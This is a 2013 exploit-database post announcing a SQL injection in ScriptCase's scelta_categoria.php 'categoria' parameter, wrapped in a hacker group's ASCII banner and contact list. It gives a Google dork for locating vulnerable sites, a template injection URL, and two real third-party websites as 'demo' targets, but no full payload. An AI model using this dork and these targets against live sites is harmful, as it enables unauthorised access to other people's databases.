ScriptCase SQL Injection

2013.06.10
Credit: Teacher_3v1l
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#----------------------------------------------------------------------# # # # 1010101010101010101010101010101010101010101010101 # # 0 __ _ __ 0 # # 1 /'__`\ /' \/\ \ 1 # # 0 /\_\ \ \ __ __ /\_, \ \ \ 0 # # 1 \/_/_\_<_ /\ \ /\ \\/_/\ \ \ \ 1 # # 0 /\ \ \ \\ \ \_/ / \ \ \ \ \____ 0 # # 1 \ \____/ \ \___/ \ \_\ \_____\ 1 # # 0 \/___/ \/__/ \/_/\/_____/ 0 # # 1 1 # # 0 >> Dr.3v1l 0 # # 1 >> 0WebSecurity.IR 1 # # 0 0 # # 1 [+] E-Mail : B.Devils.B@gmail.com 1 # # 0 [+] Y! : Teacher_3v1l 0 # # 1 1 # # 0 ########################################### 0 # # 1 I'm 3v1l member from Black_Devils B0ys Team 1 # # 0 ########################################### 0 # # 1 1 # # 0101010101010101010101010101010101010101010101010 # # # #----------------------------------------------------------------------# # [~] Exploit Title : ScriptCase SQL Injection vulnerable # # [~] Date : 2013 # # [~] Author : Hossein Hezami ( Dr.3v1l ) # # [~] Software : http://www.scriptcase.net # # [~] Version : ALL Versions # # [~] E-Mail : Teacher_3v1l@yahoo.com , B.Devils.B@gmail.com # # [~] Site : 0WebSecurity.ir # # [~] Tested on : Windows XP , Windows 7 , Windows 8 # # [~] Google Dork : inurl:"/scelta_categoria.php?categoria=" # #======================================================================# # [+] SQL I Exploit : # # # # [Target]/[path]/scelta_categoria.php?categoria=[SQLi] # # # #----------------------------------------------------------------------# # [+] Demo : # # # # http://www.grossetoannunci.it/scelta_categoria.php?categoria=14 # # http://www.livorno-annunci.com/scelta_categoria.php?categoria=14 # # # #----------------------------------------------------------------------# # [+] Note : # # # # This is a simple sql injection ;) # # # #----------------------------------------------------------------------# # # # [+] Contact Me : # # # # Teacher_3v1l@yahoo.com # # Black_Devils.B0ys@yahoo.com # # Teacher.3v1l@live.com # # B.Devils.B@gmail.com # # Twitter.com/Doctor_3v1l # # IR.LinkedIN.com/IN/Hossein3v1l # # # #======================================================================#


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top